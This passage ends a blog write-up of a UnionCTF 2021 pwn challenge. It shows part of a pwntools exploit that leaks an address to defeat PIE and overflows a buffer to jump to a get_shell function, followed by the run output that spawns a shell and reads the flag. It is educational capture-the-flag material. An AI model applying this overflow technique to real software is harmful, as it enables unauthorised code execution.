class="number">0</span></span><br><span class="line">csu_leak = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">padd</span>(<span class="params">d</span>):</span><br><span class="line">    <span class="keyword">return</span> d + <span class="string">&#x27;\00&#x27;</span>*(<span class="number">8</span>-<span class="built_in">len</span>(d))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(r.recvuntil(<span class="string">&quot;What is your name?\n\n&quot;</span>))</span><br><span class="line">r.sendline(<span class="string">&quot;nasm&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(r.recvuntil(<span class="string">&quot;4. A cr0wn\n\n&quot;</span>))</span><br><span class="line">r.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    a = r.recvuntil(<span class="string">&quot;4. A cr0wn\n\n&quot;</span>, timeout=<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> a:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(a)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> set_:</span><br><span class="line">        r.sendline(<span class="string">&quot;4&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line">    b = r.recvuntil(<span class="string">&quot;You choose attack &quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;l0zers don&#x27;t get cr0wns&quot;</span> <span class="keyword">in</span> b:</span><br><span class="line">        leak_csu = <span class="built_in">int</span>(padd(r.recvline().replace(<span class="string">&quot;\n&quot;</span>, <span class="string">&quot;&quot;</span>)))</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;leak_csu=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(<span class="built_in">hex</span>(<span class="built_in">int</span>(leak_csu))))</span><br><span class="line">        base = leak_csu - e.symbols[<span class="string">&#x27;__libc_csu_init&#x27;</span>]</span><br><span class="line"></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;base: &#123;&#125;&quot;</span>.<span class="built_in">format</span>(<span class="built_in">hex</span>(base)))</span><br><span class="line"></span><br><span class="line">        set_ = <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(r.recvuntil(<span class="string">&quot;Congratulations! You may now declare yourself the winner:\n\n&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p.pid)</span></span><br><span class="line">r.sendline(<span class="string">&quot;A&quot;</span>*<span class="number">40</span> + p64(e.symbols[<span class="string">&#x27;get_shell&#x27;</span>] + base))</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>We can compute compute the value of rand to avoid bruteforce, but I’ve choosen to do not. So while it does not print <code>l0zers don&#39;t get cr0wns</code>, I’m sending 4 for cr0wn and when it is teh case I get my leak of the csu and I compute the base address.<br>When It’s done I’m sending 1 because it sounds more speed and I wait to win.<br>And when I won I can trigger the buffer overflow and jmp on <code>get_shell</code>.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">/* ... */</span><br><span class="line">/* lot of iterations */</span><br><span class="line">/* ... */</span><br><span class="line"></span><br><span class="line">You deal 40 dmg</span><br><span class="line">The boss deals 70 dmg</span><br><span class="line">You lost!</span><br><span class="line"></span><br><span class="line">Choose an attack:</span><br><span class="line"></span><br><span class="line">1. Knife</span><br><span class="line"></span><br><span class="line">2. A bigger knife</span><br><span class="line"></span><br><span class="line">3. Her Majesty&#x27;s knife</span><br><span class="line"></span><br><span class="line">4. A cr0wn</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">leak_csu=0x55b3b5b3a4d0</span><br><span class="line">base: 0x55b3b5b39000</span><br><span class="line">You deal 140736258161760 dmg</span><br><span class="line">The boss deals 96 dmg</span><br><span class="line">You lost!</span><br><span class="line"></span><br><span class="line">Congratulations! You may now declare yourself the winner:</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">cat</span> /home/babyrarf/flag.txt</span></span><br><span class="line">union&#123;baby_rarf_d0o_d00_do0_doo_do0_d0o&#125;</span><br></pre></td></tr></table></figure>

<p>The final script can be found <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/blob/master/2021/unionctf/pwn/babyrarf/p0wn.py">here</a>.</p>
<p>That’s all folks :)</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/mipsy/"
      title="[FCSC 2021 - pwn] Itsy Mipsy router"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [FCSC 2021 - pwn] Itsy Mipsy router
        
    </p>
  </a>
  <a class="article-nav-btn right  disabled "
     >

    <p class="title-text">
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
